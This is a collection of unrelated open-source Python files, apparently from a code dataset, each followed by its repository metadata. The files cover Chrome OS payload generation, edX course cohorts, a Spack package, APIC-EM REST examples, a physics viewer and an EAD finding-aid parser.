def _RunPaygenInProcess(self, channel, board, version, debug,
skip_test_payloads, skip_delta_payloads):
"""Helper for PaygenStage that invokes payload generation.
This method is intended to be safe to invoke inside a process.
Args:
channel: Channel of payloads to generate ('stable', 'beta', etc)
board: Board of payloads to generate ('x86-mario', 'x86-alex-he', etc)
version: Version of payloads to generate.
debug: Flag telling if this is a real run, or a test run.
skip_test_payloads: Skip generating test payloads, and auto tests.
skip_delta_payloads: Skip generating delta payloads.
"""
# TODO(dgarrett): Remove when crbug.com/341152 is fixed.
# These modules are imported here because they aren't always available at
# cbuildbot startup.
# pylint: disable=F0401
try:
from crostools.lib import gspaths
from crostools.lib import paygen_build_lib
except ImportError:
# We can't generate payloads without crostools.
raise PaygenCrostoolsNotAvailableError()
# Convert to release tools naming for channels.
if not channel.endswith('-channel'):
channel += '-channel'
with osutils.TempDir(sudo_rm=True) as tempdir:
# Create the definition of the build to generate payloads for.
build = gspaths.Build(channel=channel,
board=board,
version=version)
try:
# Generate the payloads.
self._PrintLoudly('Starting %s, %s, %s' % (channel, version, board))
paygen_build_lib.CreatePayloads(build,
work_dir=tempdir,
dry_run=debug,
run_parallel=True,
run_on_builder=True,
skip_delta_payloads=skip_delta_payloads,
skip_test_payloads=skip_test_payloads,
skip_autotest=skip_test_payloads)
except (paygen_build_lib.BuildFinished,
paygen_build_lib.BuildLocked,
paygen_build_lib.BuildSkip) as e:
# These errors are normal if it's possible for another process to
# work on the same build. This process could be a Paygen server, or
# another builder (perhaps by a trybot generating payloads on request).
#
# This means the build was finished by the other process, is already
# being processed (so the build is locked), or that it's been marked
# to skip (probably done manually).
cros_build_lib.Info('Paygen skipped because: %s', e)
|
bpsinc-native/src_third_party_chromite
|
cbuildbot/stages/release_stages.py
|
Python
|
bsd-3-clause
| 14,805 | 0.006754 |
"""
This file contains the logic for cohorts, as exposed internally to the
forums, and to the cohort admin views.
"""
import logging
import random
import request_cache
from courseware import courses
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.core.validators import validate_email
from django.db import IntegrityError, transaction
from django.db.models.signals import m2m_changed, post_save
from django.dispatch import receiver
from django.http import Http404
from django.utils.translation import ugettext as _
from eventtracking import tracker
from request_cache.middleware import request_cached
from student.models import get_user_by_username_or_email
from .models import (
CohortMembership,
CourseCohort,
CourseCohortsSettings,
CourseUserGroup,
CourseUserGroupPartitionGroup,
UnregisteredLearnerCohortAssignments
)
log = logging.getLogger(__name__)
@receiver(post_save, sender=CourseUserGroup)
def _cohort_added(sender, **kwargs):
"""Emits a tracking log event each time a cohort is created"""
instance = kwargs["instance"]
if kwargs["created"] and instance.group_type == CourseUserGroup.COHORT:
tracker.emit(
"edx.cohort.created",
{"cohort_id": instance.id, "cohort_name": instance.name}
)
@receiver(m2m_changed, sender=CourseUserGroup.users.through)
def _cohort_membership_changed(sender, **kwargs):
"""Emits a tracking log event each time cohort membership is modified"""
def get_event_iter(user_id_iter, cohort_iter):
"""
        Returns an iterator of dicts, each combining cohort and user information from the given iterables
"""
return (
{"cohort_id": cohort.id, "cohort_name": cohort.name, "user_id": user_id}
for user_id in user_id_iter
for cohort in cohort_iter
)
action = kwargs["action"]
instance = kwargs["instance"]
pk_set = kwargs["pk_set"]
reverse = kwargs["reverse"]
if action == "post_add":
event_name = "edx.cohort.user_added"
elif action in ["post_remove", "pre_clear"]:
event_name = "edx.cohort.user_removed"
else:
return
if reverse:
user_id_iter = [instance.id]
if action == "pre_clear":
cohort_iter = instance.course_groups.filter(group_type=CourseUserGroup.COHORT)
else:
cohort_iter = CourseUserGroup.objects.filter(pk__in=pk_set, group_type=CourseUserGroup.COHORT)
else:
cohort_iter = [instance] if instance.group_type == CourseUserGroup.COHORT else []
if action == "pre_clear":
user_id_iter = (user.id for user in instance.users.all())
else:
user_id_iter = pk_set
for event in get_event_iter(user_id_iter, cohort_iter):
tracker.emit(event_name, event)
# A 'default cohort' is an auto-cohort that is automatically created for a course if no cohort with automatic
# assignment have been specified. It is intended to be used in a cohorted course for users who have yet to be assigned
# to a cohort, if the course staff have not explicitly created a cohort of type "RANDOM".
# Note that course staff have the ability to change the name of this cohort after creation via the cohort
# management UI in the instructor dashboard.
DEFAULT_COHORT_NAME = _("Default Group")
# tl;dr: global state is bad. capa reseeds random every time a problem is loaded. Even
# if and when that's fixed, it's a good idea to have a local generator to avoid any other
# code that messes with the global random module.
_local_random = None
def local_random():
"""
Get the local random number generator. In a function so that we don't run
random.Random() at import time.
"""
# ironic, isn't it?
global _local_random
if _local_random is None:
_local_random = random.Random()
return _local_random
def is_course_cohorted(course_key):
"""
Given a course key, return a boolean for whether or not the course is
cohorted.
Raises:
Http404 if the course doesn't exist.
"""
return _get_course_cohort_settings(course_key).is_cohorted
def get_course_cohort_id(course_key):
"""
Given a course key, return the int id for the cohort settings.
Raises:
Http404 if the course doesn't exist.
"""
return _get_course_cohort_settings(course_key).id
def set_course_cohorted(course_key, cohorted):
"""
Given a course course and a boolean, sets whether or not the course is cohorted.
Raises:
Value error if `cohorted` is not a boolean
"""
if not isinstance(cohorted, bool):
raise ValueError("Cohorted must be a boolean")
course_cohort_settings = _get_course_cohort_settings(course_key)
course_cohort_settings.is_cohorted = cohorted
course_cohort_settings.save()
def get_cohort_id(user, course_key, use_cached=False):
"""
Given a course key and a user, return the id of the cohort that user is
assigned to in that course. If they don't have a cohort, return None.
"""
cohort = get_cohort(user, course_key, use_cached=use_cached)
return None if cohort is None else cohort.id
COHORT_CACHE_NAMESPACE = u"cohorts.get_cohort"
def _cohort_cache_key(user_id, course_key):
"""
Returns the cache key for the given user_id and course_key.
"""
return u"{}.{}".format(user_id, course_key)
def bulk_cache_cohorts(course_key, users):
"""
Pre-fetches and caches the cohort assignments for the
given users, for later fast retrieval by get_cohort.
"""
# before populating the cache with another bulk set of data,
# remove previously cached entries to keep memory usage low.
request_cache.clear_cache(COHORT_CACHE_NAMESPACE)
cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE)
if is_course_cohorted(course_key):
cohorts_by_user = {
membership.user: membership
for membership in
CohortMembership.objects.filter(user__in=users, course_id=course_key).select_related('user__id')
}
for user, membership in cohorts_by_user.iteritems():
cache[_cohort_cache_key(user.id, course_key)] = membership.course_user_group
uncohorted_users = filter(lambda u: u not in cohorts_by_user, users)
else:
uncohorted_users = users
for user in uncohorted_users:
cache[_cohort_cache_key(user.id, course_key)] = None
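# Illustrative sketch (not part of the original module): how bulk_cache_cohorts is
# meant to pair with get_cohort(use_cached=True). `course_key` is assumed to be a
# CourseKey and `users` an iterable of Django User objects supplied by the caller.
def _example_bulk_cohort_lookup(course_key, users):
    """Warm the per-request cohort cache once, then read from it repeatedly."""
    bulk_cache_cohorts(course_key, users)
    # These lookups now hit the request cache instead of issuing per-user queries.
    return {user.id: get_cohort(user, course_key, assign=False, use_cached=True)
            for user in users}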
def get_cohort(user, course_key, assign=True, use_cached=False):
"""
Returns the user's cohort for the specified course.
The cohort for the user is cached for the duration of a request. Pass
use_cached=True to use the cached value instead of fetching from the
database.
Arguments:
user: a Django User object.
course_key: CourseKey
assign (bool): if False then we don't assign a group to user
use_cached (bool): Whether to use the cached value or fetch from database.
Returns:
A CourseUserGroup object if the course is cohorted and the User has a
cohort, else None.
Raises:
ValueError if the CourseKey doesn't exist.
"""
cache = request_cache.get_cache(COHORT_CACHE_NAMESPACE)
cache_key = _cohort_cache_key(user.id, course_key)
if use_cached and cache_key in cache:
return cache[cache_key]
cache.pop(cache_key, None)
# First check whether the course is cohorted (users shouldn't be in a cohort
# in non-cohorted courses, but settings can change after course starts)
if not is_course_cohorted(course_key):
return cache.setdefault(cache_key, None)
# If course is cohorted, check if the user already has a cohort.
try:
membership = CohortMembership.objects.get(
course_id=course_key,
user_id=user.id,
)
return cache.setdefault(cache_key, membership.course_user_group)
except CohortMembership.DoesNotExist:
# Didn't find the group. If we do not want to assign, return here.
if not assign:
# Do not cache the cohort here, because in the next call assign
# may be True, and we will have to assign the user a cohort.
return None
# Otherwise assign the user a cohort.
try:
with transaction.atomic():
# If learner has been pre-registered in a cohort, get that cohort. Otherwise assign to a random cohort.
course_user_group = None
for assignment in UnregisteredLearnerCohortAssignments.objects.filter(email=user.email, course_id=course_key):
course_user_group = assignment.course_user_group
unregistered_learner = assignment
if course_user_group:
unregistered_learner.delete()
else:
course_user_group = get_random_cohort(course_key)
membership = CohortMembership.objects.create(
user=user,
course_user_group=course_user_group,
)
return cache.setdefault(cache_key, membership.course_user_group)
except IntegrityError as integrity_error:
# An IntegrityError is raised when multiple workers attempt to
# create the same row in one of the cohort model entries:
# CourseCohort, CohortMembership.
log.info(
"HANDLING_INTEGRITY_ERROR: IntegrityError encountered for course '%s' and user '%s': %s",
course_key, user.id, unicode(integrity_error)
)
return get_cohort(user, course_key, assign, use_cached)
def get_random_cohort(course_key):
"""
Helper method to get a cohort for random assignment.
If there are multiple cohorts of type RANDOM in the course, one of them will be randomly selected.
If there are no existing cohorts of type RANDOM in the course, one will be created.
"""
course = courses.get_course(course_key)
cohorts = get_course_cohorts(course, assignment_type=CourseCohort.RANDOM)
if cohorts:
cohort = local_random().choice(cohorts)
else:
cohort = CourseCohort.create(
cohort_name=DEFAULT_COHORT_NAME,
course_id=course_key,
assignment_type=CourseCohort.RANDOM
).course_user_group
return cohort
def migrate_cohort_settings(course):
"""
Migrate all the cohort settings associated with this course from modulestore to mysql.
After that we will never touch modulestore for any cohort related settings.
"""
cohort_settings, created = CourseCohortsSettings.objects.get_or_create(
course_id=course.id,
defaults=_get_cohort_settings_from_modulestore(course)
)
# Add the new and update the existing cohorts
if created:
# Update the manual cohorts already present in CourseUserGroup
manual_cohorts = CourseUserGroup.objects.filter(
course_id=course.id,
group_type=CourseUserGroup.COHORT
).exclude(name__in=course.auto_cohort_groups)
for cohort in manual_cohorts:
CourseCohort.create(course_user_group=cohort)
for group_name in course.auto_cohort_groups:
CourseCohort.create(cohort_name=group_name, course_id=course.id, assignment_type=CourseCohort.RANDOM)
return cohort_settings
def get_course_cohorts(course, assignment_type=None):
"""
Get a list of all the cohorts in the given course. This will include auto cohorts,
regardless of whether or not the auto cohorts include any users.
Arguments:
course: the course for which cohorts should be returned
assignment_type: cohort assignment type
Returns:
A list of CourseUserGroup objects. Empty if there are no cohorts. Does
not check whether the course is cohorted.
"""
# Migrate cohort settings for this course
migrate_cohort_settings(course)
query_set = CourseUserGroup.objects.filter(
course_id=course.location.course_key,
group_type=CourseUserGroup.COHORT
)
query_set = query_set.filter(cohort__assignment_type=assignment_type) if assignment_type else query_set
return list(query_set)
def get_cohort_names(course):
"""Return a dict that maps cohort ids to names for the given course"""
return {cohort.id: cohort.name for cohort in get_course_cohorts(course)}
### Helpers for cohort management views
def get_cohort_by_name(course_key, name):
"""
    Return the CourseUserGroup object for the given cohort. Raises DoesNotExist
    if it isn't present.
"""
return CourseUserGroup.objects.get(
course_id=course_key,
group_type=CourseUserGroup.COHORT,
name=name
)
def get_cohort_by_id(course_key, cohort_id):
"""
    Return the CourseUserGroup object for the given cohort. Raises DoesNotExist
    if it isn't present. Uses the course_key for extra validation.
"""
return CourseUserGroup.objects.get(
course_id=course_key,
group_type=CourseUserGroup.COHORT,
id=cohort_id
)
def add_cohort(course_key, name, assignment_type):
"""
Add a cohort to a course. Raises ValueError if a cohort of the same name already
exists.
"""
log.debug("Adding cohort %s to %s", name, course_key)
if is_cohort_exists(course_key, name):
raise ValueError(_("You cannot create two cohorts with the same name"))
try:
course = courses.get_course_by_id(course_key)
except Http404:
raise ValueError("Invalid course_key")
cohort = CourseCohort.create(
cohort_name=name,
course_id=course.id,
assignment_type=assignment_type
).course_user_group
tracker.emit(
"edx.cohort.creation_requested",
{"cohort_name": cohort.name, "cohort_id": cohort.id}
)
return cohort
def is_cohort_exists(course_key, name):
"""
Check if a cohort already exists.
"""
return CourseUserGroup.objects.filter(course_id=course_key, group_type=CourseUserGroup.COHORT, name=name).exists()
def remove_user_from_cohort(cohort, username_or_email):
"""
Look up the given user, and if successful, remove them from the specified cohort.
Arguments:
cohort: CourseUserGroup
username_or_email: string. Treated as email if has '@'
Raises:
        User.DoesNotExist if the user can't be found.
        ValueError if the user is not present in this cohort.
"""
user = get_user_by_username_or_email(username_or_email)
try:
membership = CohortMembership.objects.get(course_user_group=cohort, user=user)
membership.delete()
except CohortMembership.DoesNotExist:
raise ValueError("User {} was not present in cohort {}".format(username_or_email, cohort))
def add_user_to_cohort(cohort, username_or_email):
"""
Look up the given user, and if successful, add them to the specified cohort.
Arguments:
cohort: CourseUserGroup
username_or_email: string. Treated as email if has '@'
Returns:
User object (or None if the email address is preassigned),
string (or None) indicating previous cohort,
and whether the user is a preassigned user or not
Raises:
        User.DoesNotExist if the user can't be found. However, if a valid email is provided for the user, it is
        stored in the database so that the user can be added to the cohort if they eventually enroll in the course.
        ValueError if the user is already present in this cohort.
        ValidationError if an invalid email address is entered.
"""
try:
user = get_user_by_username_or_email(username_or_email)
membership = CohortMembership(course_user_group=cohort, user=user)
membership.save() # This will handle both cases, creation and updating, of a CohortMembership for this user.
tracker.emit(
"edx.cohort.user_add_requested",
{
"user_id": user.id,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
"previous_cohort_id": membership.previous_cohort_id,
"previous_cohort_name": membership.previous_cohort_name,
}
)
return (user, membership.previous_cohort_name, False)
except User.DoesNotExist as ex:
# If username_or_email is an email address, store in database.
try:
validate_email(username_or_email)
try:
assignment = UnregisteredLearnerCohortAssignments.objects.get(
email=username_or_email, course_id=cohort.course_id
)
assignment.course_user_group = cohort
assignment.save()
except UnregisteredLearnerCohortAssignments.DoesNotExist:
assignment = UnregisteredLearnerCohortAssignments.objects.create(
course_user_group=cohort, email=username_or_email, course_id=cohort.course_id
)
tracker.emit(
"edx.cohort.email_address_preassigned",
{
"user_email": assignment.email,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
}
)
return (None, None, True)
except ValidationError as invalid:
if "@" in username_or_email:
raise invalid
else:
raise ex
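# Illustrative sketch (not part of the original module): a typical flow that creates
# a manual cohort and then enrolls a learner by username or email. `course_key` is
# assumed to be a CourseKey, and CourseCohort.MANUAL is assumed to be the manual
# assignment type defined on the CourseCohort model.
def _example_create_and_fill_cohort(course_key, username_or_email):
    cohort = add_cohort(course_key, "Example Cohort", CourseCohort.MANUAL)
    user, previous_cohort_name, preassigned = add_user_to_cohort(cohort, username_or_email)
    if preassigned:
        # A valid email for a not-yet-registered learner was stored for later assignment.
        return None
    return user, previous_cohort_name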
def get_group_info_for_cohort(cohort, use_cached=False):
"""
Get the ids of the group and partition to which this cohort has been linked
as a tuple of (int, int).
If the cohort has not been linked to any group/partition, both values in the
tuple will be None.
The partition group info is cached for the duration of a request. Pass
use_cached=True to use the cached value instead of fetching from the
database.
"""
cache = request_cache.get_cache(u"cohorts.get_group_info_for_cohort")
cache_key = unicode(cohort.id)
if use_cached and cache_key in cache:
return cache[cache_key]
cache.pop(cache_key, None)
try:
partition_group = CourseUserGroupPartitionGroup.objects.get(course_user_group=cohort)
return cache.setdefault(cache_key, (partition_group.group_id, partition_group.partition_id))
except CourseUserGroupPartitionGroup.DoesNotExist:
pass
return cache.setdefault(cache_key, (None, None))
def set_assignment_type(user_group, assignment_type):
"""
Set assignment type for cohort.
"""
course_cohort = user_group.cohort
if is_last_random_cohort(user_group) and course_cohort.assignment_type != assignment_type:
raise ValueError(_("There must be one cohort to which students can automatically be assigned."))
course_cohort.assignment_type = assignment_type
course_cohort.save()
def get_assignment_type(user_group):
"""
Get assignment type for cohort.
"""
course_cohort = user_group.cohort
return course_cohort.assignment_type
def is_last_random_cohort(user_group):
"""
Check if this cohort is the only random cohort in the course.
"""
random_cohorts = CourseUserGroup.objects.filter(
course_id=user_group.course_id,
group_type=CourseUserGroup.COHORT,
cohort__assignment_type=CourseCohort.RANDOM
)
return len(random_cohorts) == 1 and random_cohorts[0].name == user_group.name
@request_cached
def _get_course_cohort_settings(course_key):
"""
    Return cohort settings for a course. NOTE that the only non-deprecated fields in
    CourseCohortsSettings are `course_id` and `is_cohorted`. Other fields should only be used for
    migration purposes.
Arguments:
course_key: CourseKey
Returns:
        A CourseCohortsSettings object. NOTE that the only non-deprecated fields in
        CourseCohortsSettings are `course_id` and `is_cohorted`. Other fields should only be used
        for migration purposes.
Raises:
Http404 if course_key is invalid.
"""
try:
course_cohort_settings = CourseCohortsSettings.objects.get(course_id=course_key)
except CourseCohortsSettings.DoesNotExist:
course = courses.get_course_by_id(course_key)
course_cohort_settings = migrate_cohort_settings(course)
return course_cohort_settings
def get_legacy_discussion_settings(course_key):
try:
course_cohort_settings = CourseCohortsSettings.objects.get(course_id=course_key)
return {
'is_cohorted': course_cohort_settings.is_cohorted,
'cohorted_discussions': course_cohort_settings.cohorted_discussions,
'always_cohort_inline_discussions': course_cohort_settings.always_cohort_inline_discussions
}
except CourseCohortsSettings.DoesNotExist:
course = courses.get_course_by_id(course_key)
return _get_cohort_settings_from_modulestore(course)
def _get_cohort_settings_from_modulestore(course):
return {
'is_cohorted': course.is_cohorted,
'cohorted_discussions': list(course.cohorted_discussions),
'always_cohort_inline_discussions': course.always_cohort_inline_discussions
}
|
pepeportela/edx-platform
|
openedx/core/djangoapps/course_groups/cohorts.py
|
Python
|
agpl-3.0
| 21,299 | 0.002535 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class ExuberantCtags(AutotoolsPackage):
"""The canonical ctags generator"""
homepage = "http://ctags.sourceforge.net"
url = "http://downloads.sourceforge.net/project/ctags/ctags/5.8/ctags-5.8.tar.gz"
version('5.8', sha256='0e44b45dcabe969e0bbbb11e30c246f81abe5d32012db37395eb57d66e9e99c7')
|
iulian787/spack
|
var/spack/repos/builtin/packages/exuberant-ctags/package.py
|
Python
|
lgpl-2.1
| 532 | 0.005639 |
# Getting started with APIC-EM APIs
# Follows APIC-EM Basics Learning Lab
# Basics Learning Lab Full example for Get Devices, Get Hosts, Get Policies, Get Applications
# * THIS SAMPLE APPLICATION AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY
# * OF ANY KIND BY CISCO, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
# * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR
# * PURPOSE, NONINFRINGEMENT, SATISFACTORY QUALITY OR ARISING FROM A COURSE OF
# * DEALING, LAW, USAGE, OR TRADE PRACTICE. CISCO TAKES NO RESPONSIBILITY
# * REGARDING ITS USAGE IN AN APPLICATION, AND IT IS PRESENTED ONLY AS AN
# * EXAMPLE. THE SAMPLE CODE HAS NOT BEEN THOROUGHLY TESTED AND IS PROVIDED AS AN
# * EXAMPLE ONLY, THEREFORE CISCO DOES NOT GUARANTEE OR MAKE ANY REPRESENTATIONS
# * REGARDING ITS RELIABILITY, SERVICEABILITY, OR FUNCTION. IN NO EVENT DOES
# * CISCO WARRANT THAT THE SOFTWARE IS ERROR FREE OR THAT CUSTOMER WILL BE ABLE
# * TO OPERATE THE SOFTWARE WITHOUT PROBLEMS OR INTERRUPTIONS. NOR DOES CISCO
# * WARRANT THAT THE SOFTWARE OR ANY EQUIPMENT ON WHICH THE SOFTWARE IS USED WILL
# * BE FREE OF VULNERABILITY TO INTRUSION OR ATTACK. THIS SAMPLE APPLICATION IS
# * NOT SUPPORTED BY CISCO IN ANY MANNER. CISCO DOES NOT ASSUME ANY LIABILITY
# * ARISING FROM THE USE OF THE APPLICATION. FURTHERMORE, IN NO EVENT SHALL CISCO
# * OR ITS SUPPLIERS BE LIABLE FOR ANY INCIDENTAL OR CONSEQUENTIAL DAMAGES, LOST
# * PROFITS, OR LOST DATA, OR ANY OTHER INDIRECT DAMAGES EVEN IF CISCO OR ITS
# * SUPPLIERS HAVE BEEN INFORMED OF THE POSSIBILITY THEREOF.-->
# import the requests library so we can use it to make REST calls (http://docs.python-requests.org/en/latest/index.html)
import requests
# import the json library. This library provides handy features for formatting, displaying
# and manipulating json.
import json
# All of our REST calls will use the url for the APIC EM Controller as the base URL
# So lets define a variable for the controller IP or DNS so we don't have to keep typing it
controller_url = "http://sandboxapic.cisco.com/"
# Get Devices
# This function allows you to view a list of all the devices in the network (routers and switches).
get_devices_url = controller_url + 'api/v0/network-device'
#Perform GET on get_devices_url and load response into a json object
get_devices_response = requests.get(get_devices_url)
get_devices_json = get_devices_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
parent = get_devices_json["response"]
print ("Devices = ")
# for each device returned, print the networkDeviceId
for item in parent:
print (item["id"])
# Get Hosts
# This function allows you to view a list of all the hosts in the network.
get_hosts_url = controller_url + 'api/v0/host'
#Perform GET on get_hosts_url and load response into a json object
get_hosts_response = requests.get(get_hosts_url)
get_hosts_json = get_hosts_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
hosts_parent = get_hosts_json["response"]
print ("Hosts= ")
# for each host returned, print its hostIp
for item in hosts_parent:
print (item["hostIp"])
# Get Policies
# This function allows you to view a list of all the policies in the network.
get_policies_url = controller_url + 'api/v0/policy'
#Perform GET on get_policies_url and load response into a json object
get_policies_response = requests.get(get_policies_url)
get_policies_json = get_policies_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
policies_parent = get_policies_json["response"]
print ("Policies= ")
# for each policy returned, print its id
for item in policies_parent:
print (item["id"])
# Get Applications
# This function allows you to view a list of all the applications in the network.
get_apps_url = controller_url + 'api/v0/application'
#Perform GET on get_apps_url and load response into a json object
get_apps_response = requests.get(get_apps_url)
get_apps_json = get_apps_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
apps_parent = get_apps_json["response"]
print ("Applications= ")
# for each application returned, print its name
for item in apps_parent:
print (item["name"])
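# Optional refactor sketch (not part of the learning lab): the four blocks above all
# repeat the same GET / parse / print pattern, so it can be collapsed into one helper.
# The endpoint paths and field names below are taken directly from the calls above.
def print_field(endpoint, field):
    """GET an APIC-EM collection and print one field from every returned item."""
    response = requests.get(controller_url + endpoint)
    for item in response.json()["response"]:
        print (item[field])
# Equivalent to the listings above, for example:
# print_field('api/v0/network-device', 'id')
# print_field('api/v0/host', 'hostIp')
# print_field('api/v0/policy', 'id')
# print_field('api/v0/application', 'name')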
|
SivagnanamCiena/coding-skills-sample-code
|
coding102-REST-python/learning-lab-basics-step3.py
|
Python
|
apache-2.0
| 4,557 | 0.010753 |
#!/usr/bin/env python
import click
import logging
import os
import pagoda
import pagoda.viewer
def full(name):
return os.path.join(os.path.dirname(__file__), name)
@click.command()
def main():
logging.basicConfig()
w = pagoda.cooper.World(dt=1. / 120)
w.load_skeleton(full('../optimized-skeleton.txt'))
w.load_markers(full('cooper-motion.c3d'), full('../optimized-markers.txt'))
pagoda.viewer.Viewer(w).run()
if __name__ == '__main__':
main()
|
EmbodiedCognition/pagoda
|
examples/cooper.py
|
Python
|
mit
| 478 | 0 |
# module for the Container List <dsc>
import xml.etree.cElementTree as ET
from components import components
import globals
import wx
from messages import error
from mixed_content import mixed_content
def dsc(dsc_root, FASheet, version):
from wx.lib.pubsub import pub
wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading <dsc>...")
if dsc_root.find('c/c') is None:
if dsc_root.find('c01/c02') is None:
number = "noseries"
else:
number = "c01"
else:
number = "c"
"""
for top_series in dsc_root:
if top_series.find('did/unittitle') is None:
wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading series...")
else:
wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading " + top_series.find('did/unittitle').text + "...")
"""
if number == "c":
child_tag = "c"
cmpnt_count = 0
        if dsc_root.find('c/c') is None:
#Collection does not have series
FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
cmpnt_count = cmpnt_count + 1
level = "1"
components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
else:
#Collection has series
FASheet.find('CollectionSheet/CollectionMap').clear()
for component in dsc_root.iter('c'):
if component.find('c') is None:
pass
else:
cmpnt_count = cmpnt_count + 1
Component_element = ET.Element('Component')
FASheet.find('CollectionSheet/CollectionMap').append(Component_element)
ComponentLevel_element = ET.Element('ComponentLevel')
Component_element.append(ComponentLevel_element)
ComponentNumber_element = ET.Element('ComponentNumber')
Component_element.append(ComponentNumber_element)
ComponentName_element = ET.Element('ComponentName')
Component_element.append(ComponentName_element)
if component in dsc_root.iterfind('c'):
level = "1"
elif component in dsc_root.iterfind('c/c'):
level = "2"
elif component in dsc_root.iterfind('c/c/c'):
level = "3"
                    elif component in dsc_root.iterfind('c/c/c/c'):
                        level = "4"
                    elif component in dsc_root.iterfind('c/c/c/c/c'):
                        level = "5"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c'):
                        level = "6"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c'):
                        level = "7"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c'):
                        level = "8"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c'):
                        level = "9"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c'):
                        level = "10"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c/c'):
                        level = "11"
                    elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c/c/c'):
                        level = "12"
ComponentLevel_element.text = level
if component.find('did') is None:
pass
else:
if component.find('did/unitid') is None:
if "id" in component.attrib:
ComponentNumber_element.text = component.attrib['id']
elif "id" in component.find('did').attrib:
ComponentNumber_element.text = component.find('did').attrib['id']
else:
ComponentNumber_element.text = mixed_content(component.find('did/unitid'))
if component.find('did/unittitle') is None:
pass
else:
ComponentName_element.text = mixed_content(component.find('did/unittitle'))
if cmpnt_count > 51:
pass
elif cmpnt_count == 51:
error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False)
else:
components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
elif number == "c01":
cmpnt_count = 0
        if dsc_root.find('c01/c02') is None:
#Collection does not have series
FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
cmpnt_count = cmpnt_count + 1
level = "1"
            components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, "c01", version)
else:
#Collection has series
FASheet.find('CollectionSheet/CollectionMap').clear()
for component in dsc_root.iter():
if component.tag == 'c01' or component.tag == 'c02' or component.tag == 'c03' or component.tag == 'c04' or component.tag == 'c05' or component.tag == 'c06' or component.tag == 'c07' or component.tag == 'c08' or component.tag == 'c09' or component.tag == 'c10' or component.tag == 'c11' or component.tag == 'c12':
child_tag_name = component.tag[1:]
if int(child_tag_name) < 10:
child_tag = "c0" + str(int(child_tag_name) + 1)
else:
child_tag = "c" + str(int(child_tag_name) + 1)
if component.find(child_tag) is None:
pass
else:
cmpnt_count = cmpnt_count + 1
Component_element = ET.Element('Component')
FASheet.find('CollectionSheet/CollectionMap').append(Component_element)
ComponentLevel_element = ET.Element('ComponentLevel')
Component_element.append(ComponentLevel_element)
ComponentNumber_element = ET.Element('ComponentNumber')
Component_element.append(ComponentNumber_element)
ComponentName_element = ET.Element('ComponentName')
Component_element.append(ComponentName_element)
level = "0"
if component.tag == 'c01':
level = "1"
elif component.tag == 'c02':
level = "2"
elif component.tag == 'c03':
level = "3"
elif component.tag == 'c04':
level = "4"
elif component.tag == 'c05':
level = "5"
elif component.tag == 'c06':
level = "6"
elif component.tag == 'c07':
level = "7"
elif component.tag == 'c08':
level = "8"
elif component.tag == 'c09':
level = "9"
elif component.tag == 'c10':
level = "10"
elif component.tag == 'c11':
level = "11"
elif component.tag == 'c12':
level = "12"
ComponentLevel_element.text = level
if component.find('did') is None:
pass
else:
if component.find('did/unitid') is None:
if "id" in component.attrib:
ComponentNumber_element.text = component.attrib['id']
elif "id" in component.find('did').attrib:
ComponentNumber_element.text = component.find('did').attrib['id']
else:
ComponentNumber_element.text = mixed_content(component.find('did/unitid'))
if component.find('did/unittitle') is None:
pass
else:
ComponentName_element.text = mixed_content(component.find('did/unittitle'))
if cmpnt_count > 51:
pass
elif cmpnt_count == 51:
error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False)
else:
components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
elif number == "noseries":
cmpnt_count = 0
#Collection does not have series
FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
cmpnt_count = 1
level = "1"
components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, "c", version)
|
gwiedeman/eadmachine
|
source/EADtoSpreadsheet/func/dsc.py
|
Python
|
unlicense
| 7,348 | 0.02613 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of overview archive.
# Copyright © 2015 seamus tuohy, <stuohy@internews.org>
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the included LICENSE file for details.
# identification
from os import path
from os.path import abspath
from urllib.parse import urlparse
from urllib.request import urlopen
import magic
from urllib.error import HTTPError
# logging
import logging
log = logging.getLogger("oa.{0}".format(__name__))
def filetype(file_path):
if path.exists(file_path) and path.isfile(file_path):
try:
file_type = magic.from_file(abspath(file_path), mime=True)
except IOError:
log.error("{0} is not a valid file".format(file_path))
